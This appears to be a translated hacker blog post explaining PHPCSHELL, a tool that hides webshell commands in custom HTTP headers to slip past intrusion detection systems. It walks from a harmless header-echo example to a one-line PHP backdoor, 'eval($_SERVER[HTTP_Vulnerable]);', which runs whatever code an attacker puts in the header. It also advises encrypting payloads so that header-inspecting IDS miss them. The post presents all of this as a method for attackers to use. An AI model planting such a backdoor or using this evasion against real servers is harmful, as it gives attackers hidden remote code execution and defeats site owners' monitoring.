http://www.vul.kr/?p=455 Author: TTFCT
In 2006, I discovered that HTTP HEADER could be customized and inserted the specified code. In August 2006, I successfully completed the PHPCSHELL C/S TOOL. Since then, I have been using this TOOL to bypass IDS. In 2007, I encountered the problem of using WSC POST to submit unsuccessfully. Regarding the connection situation, I successfully connected using PHPCSHELL and have been using it since then. The concealment is very good.
Having said so much, it’s time to explain the principle of PHPCSHELL:
Let us first look at a piece of HTTP HEADER
GET / HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: www.vul.kr
Connection: Keep-Alive
Cookie: www.vul.kr
HTTP HEADER contains Accept, Accept-Language, User-Agent, Host and other information. I published an article two years ago about BBSXP. Injection is achieved by modifying User-Agent. In addition to modification, you can also modify HTTP HEADER adds items, for example we add:
vulnerable: welcome to www.vul.kr
The complete HTTP HEADER is as follows:
GET / HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: www.vul.kr
Vulnerable: welcome to www.vul.kr
Connection: Keep-Alive
Cookie: websitecookie
On the server side, the receiving code is as follows:
echo ($_SERVER[HTTP_Vulnerable]);
?>
After submitting the HTTP packet NC, "welcome to www.vul.kr" is successfully displayed. In this way, we obtain our customized information in the HTTP header. The submitted data of POST and GET can be made into one sentence. Of course, HTTP HEADER Packet submission is also possible, and can bypass some IDS, which is why I always use PHPCSHELL.
If the server changes to:
eval($_SERVER[HTTP_Vulnerable]);
?>
Has it become a typical sentence? :)
Some IDS are very BT and will check the HTTP HEADER. There are still ways to bypass it. Here is a tip: encrypt the packet and decrypt it on the server side before executing it.
PHPCSHELL diagram, I originally wanted to make it have the same function as WSC, but the workload is too heavy and I don’t have time to write it.
PS: There is a character limit for HTTP HEADER submission. The allowed character length is: 8184.
Finally, everyone is welcome to go to http://www.vul.kr